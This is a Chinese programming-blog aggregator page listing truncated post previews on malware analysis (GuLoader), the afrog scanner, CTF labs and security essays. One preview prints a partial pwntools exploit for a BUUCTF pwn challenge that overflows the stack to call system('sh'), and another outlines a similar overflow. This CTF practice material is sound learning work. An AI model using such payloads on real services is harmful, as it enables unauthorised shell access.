代码编织梦想

剖析gorgon apt的新变体guloader(cloudeye)对抗技术_菜鸟m号的博客-爱代码爱编程

1 为什么是 GuLoader GuLoader,或者也被称为 CloudEye,是一个小型 VB5/6 下载器恶意软件。通常,它会从 Google Drive 下载远程访问工具(RAT)和窃取程序,例如 Agent Tesla,Arkei/Vidar,Formbook,Lokibot,Netwire 和 Remcos。 GuLoader 因其反虚拟

afrog 进阶篇(实战)_事了着衣去的博客-爱代码爱编程

实战进阶篇          这里举4个例子,耐心看完,无论对你日常渗透还是护网打比赛,都有帮助。 关于afrog是什么,怎么用,高级用法,请看基础篇。 目录 一、fofa 针对某个漏洞批量操作 二、端口 三、内网 四、编写POC POC是用YAML 语言编写的,YAML是什么,自行百度。 总结: 一、fofa 针对某个漏洞

afrog 基础篇_事了着衣去的博客-爱代码爱编程

afrog         afrog 是一款性能卓越、快速稳定、PoC可定制的漏扫工具,PoC 涉及 SQL注入、XSS、CVE、CNVD、默认口令、SSRF、信息泄露、指纹识别、未授权访问、文件上传、任意文件读取、命令执行、各种框架漏洞,帮助渗透工程师快速定位漏洞。 特点: 1、速度快,准确率高 2、实时显示结果 3、在线更新POC 4、长

shiro----出现 slf4j: no slf4j providers were found. 错误完美解决!!!_灯塔在哪里的博客-爱代码爱编程

从官网上下载的Shiro包,将pom文件夹里的dependencies包导进入报错, 解决方法: 1.修改pom文件下的依赖: <dependency> <groupId&g

【实验四 ctf实践】_vv.yyds的博客-爱代码爱编程

文章目录 一、实验目的及环境二、实验步骤1、发现目标 (netdiscover),找到WebDeveloper的IP地址。2、利用NMAP扫描目标主机,发现目标主机端口开放、服务情况,截图并说明目标提供的服务有哪些?

vmware explore 2022 china,赋能中国企业加速实现云智能_csdn云计算的博客-爱代码爱编程

全球领先的企业软件创新者VMware(NYSE: VMW)的年度技术盛会—— VMware Explore 2022 China于11月8日正式举行。本届大会以“探索多云宇宙”为主题,汇聚云计算领域的顶尖技术专家和创新者,通过150多场解决方案演讲、围绕云基础架构、网络和安全、应用现代化以及数字化工作空间四大主题,深入探讨了中国企业在数字化转型过程中面临的

联想filez助力知名生物制药企业 建立业务数据安全体系_联想filez协同办公的博客-爱代码爱编程

苏州某生物制药企业是一家抗体研发企业,其研发生产基地设在苏州。主要从事临床样品(原液和成品)的开发和生产,致力于通过持之以恒的研发和专业的生产技术,以最快的速度实现生物制品的批准。 随着企业各项业务的快速发展,现有文件共享服务器的管理方式已经无法满足其业务及安全上的应用诉求。 主要存在以下问题 01 缺乏文件历史版本过程记录。其现有业务文档

网络安全学习笔记——红队实战攻防(下)_nosery的博客-爱代码爱编程

目录 建立实战化的安全体系          完善面向实战的纵深防御体系         形成面向过程的动态防御能力         建设以人为本的主动防御机制         基于情报的精准防御能力         打造高效一体的联防联控机制         强化行之有效的整体防御能力                    

atf源码篇(九):docs文件夹-components组件(8)固件升级_摸肚子的小胖子的博客-爱代码爱编程

固件更新(FWU) 本文档描述了TF-A中可用的各种固件更新(FWU)机制的设计。 1、PSA固件更新(PSA FWU)-平台安全架构2、TBBR固件更新(TBBR FWU)-可信板引导要求 PSA固件更新实施了同名规

如何解决web前端安全问题?_二山记的博客-爱代码爱编程

我国网络技术水平的提升,带动着WEB前端业务量的显著增长,人们对于网络服务的需求也日益复杂,与此同时,越来越多的黑客出现,其攻击水平也有了明显提升,WEB前端也成为了众多黑客进行网络攻击的主要目标。 因此,开发者在进行网站建设,运营者在进行网站维护的过程中,不但要确保服务器的安全性,也应加强对WEB前端安全性的保护。 Gartner对安全架构的定义是:

buuctf pwn 部分exp(无解析,持续更新)_0rangecat的博客-爱代码爱编程

wustctf2020_getshell2   exp from pwn import * p = remote("node4.buuoj.cn", 27238) call_system=0x8048529 sh_addr=0x08048670 payload=b'a'*28+p32(0x8048529)+p32(sh_addr) p.sendli

【ce入门教程】使用cheat engine(ce)修改游戏“植物大战僵尸”之其他篇_fly1ng.m的博客-爱代码爱编程

目录 1.跳关(任意选择关卡) 2.修改金币值 3.实现自动收集阳光  上一期教程中,我们学习了寻找植物大战僵尸僵尸距离基址、实现“秒杀”僵尸的方法。PS:上篇链接:【CE入门教程】使用Cheat Engine(CE)修改游戏“植物大战僵尸”之僵尸篇_Fly1ng.M的博客-CSDN博客 1.跳关(任意选择关卡) 分析:我们可以分别

再度入榜 | 中睿天下入选《中国网络安全企业100强》_zorelworld的博客-爱代码爱编程

近日,国内权威网络安全媒体、第三方安全咨询机构安全牛发布第十版《中国网络安全企业100强》(以下简称“百强”),中睿天下以强大的综合发展实力和强劲的发展势头再次荣登百强榜单。 安全牛作为国内网络安全行业权威媒体,其发布的百强榜单持续帮助行业用户建立对我国网络安全企业能力及特点的基础性认知,受到行业的高度关注。此次百强调研活动共有300余家安全

2022年11月19日(星期六):骑行甸尾_xz541804705的博客-爱代码爱编程

2022年11月19日(星期六):骑行甸尾赏水杉林,早8:30到9:00, 北京路延长线尽头龙泉小学前集合,9:30点准时出发 【因迟到者,骑行速度快者,可自行追赶偶遇。】 偶遇地点: 北京路延长线尽头龙泉小学前集合,家住南,东,西的骑友在下列时间,地点等候。 骑行地点: 北京路延长线尽头龙泉小学---中坝村---道班---山顶---小河---甸尾羊肉馆

ctf pwn buuctf ciscn_2019_n_1_0rangecat的博客-爱代码爱编程

一,查保护。 NX保护,堆栈不可执行。 64位程序 二,拖进IDA分析 调用了func()函数,进去后分析。 如下图: 主要思路就是覆盖v2的地址为11.28125,利用gets函数输入v1时存在的栈溢出漏洞。 三,找payload所需条件。 v1距离v2为16×3-4=44. 11.28125的地址: 图上箭头指的

s标签肽,h2n-ketaaakferqhmds-oh_salepeptide的博客-爱代码爱编程

&nbsp; &nbsp;S Tag Peptide 是一种合成的多肽,由15个氨基酸残基构成。S Tag Peptide is a 15 amino acid peptide derived from RNase A. 编号: 188345中文名称: 多肽标签S-tag 、S标签肽英文名: S-tag peptide单字母: H2N-K

移动前端安全防护主流方案_finbird的博客-爱代码爱编程

近年来,随着互联网、物联网、移动设备、5G通讯等技术的齐头发展,人类的生活和工作越来越离不开软件和互联网,正如人类社会文明发展到一定程度以后,会需要法律等社会规范来保护一样,线上环境也是一样道理。 Gartner 对安全架

一口气说完网络安全设备的功能和作用_info-sec的博客-爱代码爱编程

防火墙 防火墙,是在不同网络(如可信任的内部网络和不可信任的公共外部网络)或同一网络的不同安全域之间建立一个安全控制点,通过允许、拒绝或重新定向经过防火墙的数据流,实现对进、出内部网络的服务和访问的审计和控制。防火墙在OS

app安全架构之前端安全防护_speedoooo的博客-爱代码爱编程

近年来,随着互联网、物联网、移动设备、5G通讯等技术的齐头发展,人类的生活和工作越来越离不开软件和互联网,正如人类社会文明发展到一定程度以后,会需要法律等社会规范来保护一样,线上环境也是一样道理。 Gartner 对安全架构的定义是:安全架构是计划和设计组织的、概念的、逻辑的、物理的组件的规程和相关过程,这些组件以一致的方式进行交互,并与业务需求相适应,

网络安全事件分级_李白来了的博客-爱代码爱编程

对网络安全事件进行必要分级,是做好应急响应工作的前提。网络安全事件分级要统筹考虑诸多因素,直观展示信息安全事件的风险程度,为后续处置工作提供重要参考。 一、网络安全事件的分级要素 对网络安全事件的分级主要考虑3个要素:一